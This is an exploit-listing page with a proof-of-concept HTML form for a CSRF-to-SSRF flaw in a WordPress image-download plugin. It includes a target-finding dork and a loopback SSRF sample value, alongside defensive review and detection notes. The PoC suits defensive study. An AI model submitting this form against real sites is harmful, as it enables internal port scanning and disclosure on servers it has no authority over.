## https://sploitus.com/exploit?id=PACKETSTORM:173513
# Exploit Author : Etharus  
# Vulnerability : Cross-Site Request Forgery (CSRF) leading to Server-Side Request Forgery (SSRF)  
# Impact : internal IP disclosure, file extension bypass, internal port scan.  
# Product Vendor : Nazakat Ali  
# Version Tested : 1.8  
# Date : 14/07/2023  
# Fofa Dork : "/wp-content/plugins/wp-force-images-download/"  
  
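<!--
  Proof-of-concept form from the advisory header above, kept for defensive
  analysis. It sends a POST to the plugin's wpfid.php endpoint carrying only
  two fields, wpfid_pic_url and new_name; there is no anti-CSRF token field,
  which matches the header's CSRF claim. "https://target" is the advisory's
  placeholder host. The plugin's server-side code is not shown on this page,
  so the points below are review items to confirm against the plugin source.

  Review items for an affected install (version 1.8 per the header):
  - Request origin: the handler should require a valid WordPress nonce and an
    authorised user (wp_verify_nonce / check_admin_referer, current_user_can)
    before acting on the POST.
  - URL handling: the value of wpfid_pic_url should be validated on the server:
    http/https only, loopback, private and link-local addresses rejected after
    DNS resolution, and redirects not followed blindly. WordPress ships
    wp_http_validate_url and wp_safe_remote_get for this purpose.
  - File type: the sample value below carries ".jpg" only in the query string,
    which is consistent with the header's "file extension bypass"; presumably
    the plugin checks the URL suffix. The fetched content type should be
    checked instead.
  - Detection: look in web logs for POSTs to
    /wp-content/plugins/wp-force-images-download/wpfid.php with a foreign
    Origin/Referer, and for outbound requests from the web server to internal
    addresses.

  Dark Reader browser-extension residue (inline CSS custom properties and empty
  data attributes injected when the page was captured) has been removed from
  the button; it was not part of the published form.
-->
<form id="wpfid-form" method="post" action="https://target/wp-content/plugins/wp-force-images-download/wpfid.php">
<!-- The placeholder is only the advisory's sample value; nothing is pre-filled. -->
<input name="wpfid_pic_url" type="text" placeholder="[TARGET URL] : http://127.0.0.1/?r=bypass.jpg">
<br><input name="new_name" type="hidden" value="">
<button style="background: gray;" class="d-btn" id="wpfid_button" type="submit" title="Download">
<span style="line-height: 30px;" class="wpfid_title">Download</span>
</button>
</form>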